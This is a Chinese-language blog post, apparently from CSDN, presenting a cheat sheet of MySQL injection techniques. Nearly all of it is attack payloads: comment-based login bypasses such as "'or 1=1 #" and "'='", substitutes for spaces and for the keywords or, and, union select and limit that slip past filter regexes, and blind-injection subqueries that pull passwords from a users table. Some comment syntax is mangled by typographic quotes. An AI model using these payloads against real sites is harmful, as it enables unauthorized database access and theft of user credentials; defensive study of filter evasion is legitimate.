MySQL注入技巧

最新推荐文章于 2023-03-24 16:40:26 发布

soldier_wing

最新推荐文章于 2023-03-24 16:40:26 发布

阅读量357

点赞数

分类专栏：信息安全文章标签： mysql

本文链接：https://blog.csdn.net/MVCAndroid/article/details/74002348

版权

信息安全专栏收录该内容

3 篇文章 0 订阅

订阅专栏

1 MySQL语法以及认证绕过
注释符：
#
– X(X为任意字符)
/*(MySQL-5.1)
;%00
'or 1=1;%00 'or 1=1 union select 1,2’
‘or 1=1 #
‘/!50000or/ 1=1 – - //版本号为5.1.38时只要小于50138
‘/!or/ 1=1 – -
前缀：
任意混合 + - ~ !
‘or –+2=- -!!!’2
测试后发现and/or后面可以跟上偶数个!、~可以替代空格，也可以混合使用(混合后规律又不同)，and/or前的空格可以省略
‘or- -!!!1=1；
运算符：
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……

‘or 1 rlike ‘1

空格替换：%20, %09, %0a, %0b, %0c, %0d, %a0
也可以插入括号，前缀，操作符，引号
‘or+(1)sounds/**/like”1”–%a0-

字符串格式
’ or “a”=’a’
’ or ‘a’=n’a’ //unicode
’ or ‘a’=b’1100001’ //binary
’ or ‘a’=_binary’1100001’ //5.5.41下测试无效
’ or ‘a’=x’61’ //16进制

2、MySQL常用的一些小工具

常量：true， false， null， \N, current_timestamp….
变量：@myvar:=1
系统变量：@@version, @@datadir….
常用函数：version(), pi(), pow(), char(), substring()….

3、MySQL类型转换

’ or 1=true #true=1, false=0
’ or 1 #true
’ or version()=5.5 #5.5.41-log
’ or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4

select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

4、认证绕过

绕过语句：’=’

select data from users where name=”=”
select data from users where flase=”
select data from users where 0=0

绕过语句：’-‘

select data from users where name=”-”
select data from users where name=0-0
select data from users where 0=0

0x02 关键字过滤

空格
过滤代码/\s/
%20, %09, %0a, %0b, %0c, %0d, %a0

关键字OR，AND
过滤代码/\sor\s/i,/\sand\s/i
‘||1=’1 #or
‘=’
‘&&1=’1 #and

关键字union select
过滤代码/union\s+select/i

‘and(true)like(false)union(select(pass)from(users))#
‘union [all|distinct] select pass from users#
‘union%a0select pass from users#
‘union/!select/pass from users#
/vuln.php?id=1 union/&sort=/select pass from users– -

如果单独过滤union,使用盲注来获取数据

‘and(select pass from users limit 1)=’secret

通过子查询获取单值来进行比较
关键字limit
过滤代码/limit/i

‘and(select pass from users where id=1)=’a
‘and(select pass from users group by id having id=1)=’a
‘and length((select pass from users having substr(pass,1,1)=’a’))

关键字having
过滤代码/having/i

‘and(select substr(group_concat(pass),1,1)from users)=’a

关键字select … from
过滤代码/SELECT\s+[A-Za-z.]+\s+FROM/i/i

select [all|distinct] pass from users
selecttable_namefrominformation_schema . tables
select pass as alias from users
select pass aliasalias from users
select passalias aliasfrom users
select+pass%a0from(users)

soldier_wing

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
MySQL注入技巧

1 MySQL语法以及认证绕过注释符： # – X(X为任意字符) /*(MySQL-5.1) ;%00 'or 1=1;%00 'or 1=1 union select 1,2’ ‘or 1=1 # ‘/!50000or/ 1=1 – - //版本号为5.1.38时只要小于50138 ‘/!or/ 1=1 – - 前缀：任意混合 + - ~ ! ‘or
复制链接

扫一扫